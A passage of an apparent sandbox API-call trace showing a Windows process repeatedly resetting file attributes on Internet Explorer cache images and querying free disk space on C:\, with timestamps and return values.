lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.368] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png", dwFileAttributes=0x80) returned 1 [0144.370] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.376] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg", dwFileAttributes=0x80) returned 1 [0144.378] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.393] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg", dwFileAttributes=0x80) returned 1 [0144.397] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.403] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg", dwFileAttributes=0x80) returned 1 [0144.405] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.411] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg", dwFileAttributes=0x80) returned 1 [0144.413] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.419] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg", dwFileAttributes=0x80) returned 1 [0144.421] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.431] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg", dwFileAttributes=0x80) returned 1 [0144.434] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.439] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg", dwFileAttributes=0x80) returned 1 [0144.444] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.449] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg", dwFileAttributes=0x80) returned 1 [0144.452] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.458] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg", dwFileAttributes=0x80) returned 1 [0144.461] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.477] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg", dwFileAttributes=0x80) returned 1 [0144.479] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.484] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg", dwFileAttributes=0x80) returned 1 [0144.487] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.492] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg", dwFileAttributes=0x80) returned 1 [0144.495] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.501] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg", dwFileAttributes=0x80) returned 1 [0144.505] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.513] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg", dwFileAttributes=0x80) returned 1 [0144.516] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.522] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg", dwFileAttributes=0x80) returned 1 [0144.525] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.530] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg", dwFileAttributes=0x80) returned 1 [0144.533] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.540] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg", dwFileAttributes=0x80) returned 1 [0144.543] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.548] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg", dwFileAttributes=0x80) returned 1 [0144.551] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.555] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg", dwFileAttributes=0x80) returned 1 [0144.558] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.563] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg", dwFileAttributes=0x80) returned 1 [0144.566] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.571] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg", dwFileAttributes=0x80) returned 1 [0144.575] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.580] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg", dwFileAttributes=0x80) returned 1 [0144.583] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.588] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg", dwFileAttributes=0x80) returned 1 [0144.590] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.596] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg", dwFileAttributes=0x80) returned 1 [0144.598] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.604] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg", dwFileAttributes=0x80) returned 1 [0144.606] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.611] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg", dwFileAttributes=0x80) returned 1 [0144.615] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.620] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg", dwFileAttributes=0x80) returned 1 [0144.623] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.628] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg", dwFileAttributes=0x80) returned 1 [0144.631] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.636] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg", dwFileAttributes=0x80) returned 1 [0144.640] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.645] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg", dwFileAttributes=0x80) returned 1 [0144.648] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.655] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg", dwFileAttributes=0x80) returned 1 [0144.657] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.663] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg", dwFileAttributes=0x80) returned 1 [0144.666] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.673] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg", dwFileAttributes=0x80) returned 1 [0144.676] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.681] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg", dwFileAttributes=0x80) returned 1 [0144.684] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.690] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg", dwFileAttributes=0x80) returned 1 [0144.692] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.698] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg", dwFileAttributes=0x80) returned 1 [0144.700] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.708] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg", dwFileAttributes=0x80) returned 1 [0144.711] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.716] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeKvV[1].jpg", dwFileAttributes=0x80) returned 1 [0144.718] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.765] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeNd8[1].png", dwFileAttributes=0x80) returned 1 [0144.768] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.776] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg", dwFileAttributes=0x80) returned 1 [0144.779] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.784] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeZ0k[1].jpg", dwFileAttributes=0x80) returned 1 [0144.787] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.792] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg", dwFileAttributes=0x80) returned 1 [0144.795] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.800] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfAc5[1].jpg", dwFileAttributes=0x80) returned 1 [0144.826] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.836] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg", dwFileAttributes=0x80) returned 1 [0144.839] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.845] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfjuT[1].jpg", dwFileAttributes=0x80) returned 1 [0144.848] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.854] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfkgi[1].jpg", dwFileAttributes=0x80) returned 1 [0144.857] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.864] SetFileAttributesW 